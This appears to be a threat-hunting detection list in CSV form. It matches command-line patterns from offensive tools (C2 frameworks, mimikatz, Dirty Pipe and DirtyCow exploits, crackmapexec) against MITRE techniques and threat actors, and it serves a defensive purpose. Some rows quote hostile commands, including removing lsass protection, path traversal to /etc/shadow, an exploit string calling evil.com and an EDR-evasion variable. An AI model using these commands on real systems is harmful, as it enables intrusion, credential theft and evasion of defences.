-*!handlers load *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!implants 
*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!interactive *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!modules load *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!processprotect *lsass.exe*,offensive_tool_keyword,mimikatz,removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. 
command: !processprotect /process:lsass.exe /remove,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*!put */tmp*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!shell *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!tunnels --tcp*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!use *aes256_py*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!use *reflected_assembly*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*!wPkgPath!*!ak!*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*$attacker_IPlist*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*$C2_SERVER*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z
-*$DummyServiceName*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*$env:COMPlus_ETWEnabled=0*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z
-*$KeePassBinaryPath*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*$KeePassUser*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*%APPDATA%/Indexing.*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*%comspec% /k *.bat*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,0,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*%COMSPEC%*echo*\pipe\*,greyware_tool_keyword,echo,Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.,T1068.003 - T1078.002,TA0004 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*%SystemRoot%\\MEMORY.DMP*,greyware_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*&& telnet * 2>&1 &Email=autodiscover/autodiscover.json%3f@evil.com,T1190 - T1140 - T1564 - T1204 - T1505,TA0001 - TA0005,N/A,N/A,Exploitation tools,https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*...::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A 
-*../../../../../../etc/passwd*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*../../../../../../etc/shadow*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*./*octopus.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z
-*./agscript *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*./awsloot *,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z
-*./awsloot.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z
-*./Brutesploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z
-*./c2lint *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*./chisel *,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*./cowpy.sh *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,0,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z
-*./cowroot*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,0,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z
-*./dcow -s*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,0,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z
-*./Dent -*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*./dirty*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,0,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z -*./Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*./Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*./dnscat*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*./dome.py*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*./donut *.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control 
framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*./encryptor -f *.exe -o *.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*./Exfil.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*./exploit /etc/passwd 1 *cat /etc/passwd*,offensive_tool_keyword,dirty-pipe,POC exploitation for dirty pipe vulnerability,T1068 - T1055 - T1003 - T1015,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xIronGoat/dirty-pipe,1,0,N/A,N/A,1,9,9,2022-03-08T15:47:53Z,2022-03-08T15:30:45Z -*./exploit /etc/passwd 1 ootz:*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*./fake-sms*,offensive_tool_keyword,fake-sms,A simple command line 
tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,0,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*./fee.py*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*./gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,0,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*./getExploit*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z -*./gimmeSH*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. 
your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z -*./go-secdump*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*./hashcat -*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*./hashview/*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*./Havoc,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*./havoc *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z 
-*./hoaxshell*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*./hping *,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*./hydra *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*./inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense 